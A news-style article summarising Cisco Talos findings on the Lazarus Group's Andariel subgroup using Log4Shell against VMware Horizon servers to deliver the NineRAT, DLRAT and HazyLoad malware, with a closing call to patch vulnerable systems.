The Lazarus Group, a North Korean cybercriminal entity, has launched a significant global campaign leveraging vulnerabilities in Log4j to facilitate the deployment of previously unknown remote access trojans (RATs). This operation, termed “Operation Blacksmith” by Cisco Talos, employs a range of malware families written in DLang, notably including a RAT known as NineRAT, which utilizes Telegram for command and control (C2) communications.
Cisco Talos researchers have characterized this approach as a marked evolution in the group’s tactics, aligning them with a broader sub-group known as Andariel (also referred to as Onyx Sleet or Silent Chollima). The Andariel subgroup is typically assigned roles such as initial access and long-term infiltration to support North Korean governmental objectives.
Initial exploitation efforts involve targeting publicly accessible VMWare Horizon servers through the exploitation of CVE-2021-44228, known as Log4Shell. Once access is gained, NineRAT is delivered primarily to victims in sectors such as manufacturing, agriculture, and physical security.
Despite having been publicly disclosed two years prior, approximately 2.8% of applications are still utilizing vulnerable versions of Log4j. This continual exploitation underscores the pressing cybersecurity risks that businesses face, as both the Lazarus Group and other threat actors capitalize on unpatched systems.
Developed around May 2022, NineRAT has already been linked to attacks against a South American agricultural organization as well as a European manufacturing firm by September 2023. By harnessing a legitimate messaging service for C2 communication, the attackers aim to obscure their activities from detection.
As an operational tool, NineRAT provides attackers with a robust mechanism to execute various commands on infected systems, including gathering system information, uploading files, and performing self-upgrades. Researchers note that an activated NineRAT instance interacts with its C2 channel to further fingerprint the compromised environments.
In addition to NineRAT, a custom proxy tool named HazyLoad has also been identified in the attacks, previously linked to exploiting vulnerabilities in JetBrains TeamCity (CVE-2023-42793). This tool is delivered via another malware component known as BottomLoader.
Cisco Talos has noted that DLRAT, another variant used in Operation Blacksmith, performs reconnaissance and can facilitate malware deployment while interpreting commands from its C2 infrastructure. This iterative use of various malware types further grants the Lazarus Group resilience, ensuring persistent access even if one avenue is compromised.
The repeated exploitation of Log4Shell by Andariel illustrates the versatility of this tactic, which has previously enabled the group to deploy RATs such as EarlyRat successfully. Concurrently, other North Korean factions, including the Kimsuky group, have been seen employing advanced tactics such as spear-phishing to distribute variants of malware like Amadey and RftRAT.
As businesses continue to face sophisticated cyber threats, it remains crucial for organizations to prioritize robust cybersecurity measures, particularly against the backdrop of evolving tactics employed by adversaries. Failure to properly patch known vulnerabilities could result in serious breaches and operational disruptions.
